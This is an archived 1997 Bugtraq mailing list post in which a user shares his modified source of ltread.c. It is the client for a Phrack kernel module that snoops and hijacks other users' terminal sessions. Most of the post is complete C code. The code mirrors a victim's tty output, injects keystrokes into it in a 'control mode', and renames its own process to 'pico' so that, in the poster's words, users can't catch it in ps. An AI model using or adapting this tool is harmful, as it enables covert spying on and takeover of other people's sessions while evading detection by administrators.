Home page logo
/

bugtraq logo Bugtraq mailing list archives

Handy change I made in ltread.c
From: bugtraq () DRAGO NWS NET (Nathan D. Faber)
Date: Tue, 15 Apr 1997 15:51:04 -0400


I found myself always writing in my users tty's by accident when I forgot
to close the snooper, this is the best tty hijacker ive seen so I figured
I would make a few modifications in it for my personal use and I thought
maybe other people would find it handy.

Things I added/changed:
-Control mode (basicly takeover mode but changed the key simply because
CTRL-X is a function key used in alot of programs, ` activated control
mode now.
-Beep signal when typing in non-control mode (wont be sent to
tty).
-Pretty colors (humpf? just so I could easily tell what mode is on)
-Changed argv[0] to "pico" (so users cant catch ya in a ps), also changed
argv[1] to "      "(6 white spaces), so unless your initial executed file
is longer than "pico" the process should be hidden as "pico".
-------------------------------------------------------------------------
I also found this strange:
root      4927 99.9  1.1   860   264   1 R   15:49   0:02 pico
               ^^^^
seems to run fine though.  here is the modified ltread.c
-------------------------------------------------------------------------


<++> linspy/ltread.c
/*Modified by Nathan D. Faber
Drago () Drago com
Modified from ltread.c in Phrack Issue 50 - (P50-05)
[Giving credit where its due.]
*/
/*           .oO Phrack 50 Oo.
          Volume Seven, Issue Fifty
                  5 of 16
 ============================================
 Abuse of the Linux Kernel for Fun and Profit
          halflife () infonexus com
           [guild  corporation]
 ============================================*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <termios.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
struct termios save_termios;
int ttysavefd = -1;
int fd;

#ifndef DEVICE_NAME
#define DEVICE_NAME "/dev/ltap"
#endif

#define LS_SETMAJOR     0
#define LS_SETMINOR     1

#define LS_FLUSHBUF     2
#define LS_TOGGLE       3

void stuff_keystroke(int fd, char key)
{
ioctl(fd, TIOCSTI, &key);
}

int tty_cbreak(int fd)
{
   struct termios buff;
   if(tcgetattr(fd, &save_termios) < 0)
      return -1;
   buff = save_termios;
   buff.c_lflag &= ~(ECHO | ICANON);
   buff.c_cc[VMIN] = 0;
   buff.c_cc[VTIME] = 0;
   if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
      return -1;
   ttysavefd = fd;
   return 0;
}

 char *get_device(char *basedevice)
{
   static char devname[1024];
   int fd;

   if(strlen(basedevice) > 128) return NULL;
   if(basedevice[0] == '/')
      strcpy(devname, basedevice);
   else
      sprintf(devname, "/dev/%s", basedevice);
   fd = open(devname, O_RDONLY);
   if(fd < 0) return NULL;
   if(!isatty(fd)) return NULL;
   close(fd);
   return devname;
}


int do_ioctl(char *device)
{
   struct stat mystat;

   if(stat(device, &mystat) < 0) return -1;
    fd = open(DEVICE_NAME, O_RDONLY);
   if(fd < 0) return -1;
   if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
   if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
}


void sigint_handler(int s)
{
   exit(s);
}

void cleanup_atexit(void)
{
   puts(" ");
   if(ttysavefd >= 0)
      tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
}

main(int argc, char **argv)
{
   int my_tty;
   char *devname;
    unsigned char ch;
   int i;
   int x=0;
   char count[]="      ";
   if(argc != 2)
   {
      fprintf(stderr, "%s ttyname\n", argv[0]);
      fprintf(stderr, "ttyname should NOT be your current tty!\n");
      exit(0);
   }
   devname = get_device(argv[1]);
        strcpy(argv[0],"pico");
        strcpy(argv[1],count);
   if(devname == NULL)
   {
      perror("get_device");
      exit(0);
   }
   if(tty_cbreak(0) < 0)
   {
      perror("tty_cbreak");
      exit(0);
   }
   atexit(cleanup_atexit);
   signal(SIGINT, sigint_handler);
   if(do_ioctl(devname) < 0)
   {
      perror("do_ioctl");
      exit(0);
   }
   my_tty = open(devname, O_RDWR);
   if(my_tty == -1) exit(0);
   setvbuf(stdout, NULL, _IONBF, 0);
   printf(" [0m [2J [1;1H [1;25;37;40m[ [31mnow monitoring session [37m] [0m\n\a");
 while(1)
   {
      i = read(0, &ch, 1);
      if(i > 0)
      {
         if(ch == '`')
         {
      if (x==0){
           printf(" [1m[ [34mControl mode on [37m] [34m  [0m\a\n");
           ioctl(fd, LS_TOGGLE, 0);
           x=1;
                 }
      else{
        printf(" [1m[ [34mControl mode off [37m] [34m  [0m\a\n");
        ioctl(fd, LS_TOGGLE, 0);
        x=0;
        }
          }
       else{
          if (x==1){
                stuff_keystroke(my_tty,ch);}
        else{
        printf("\a");}}
        }
      i = read(fd, &ch, 1);
      if(i > 0)
         putchar(ch);
    }
}
<--> end ltread.c



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]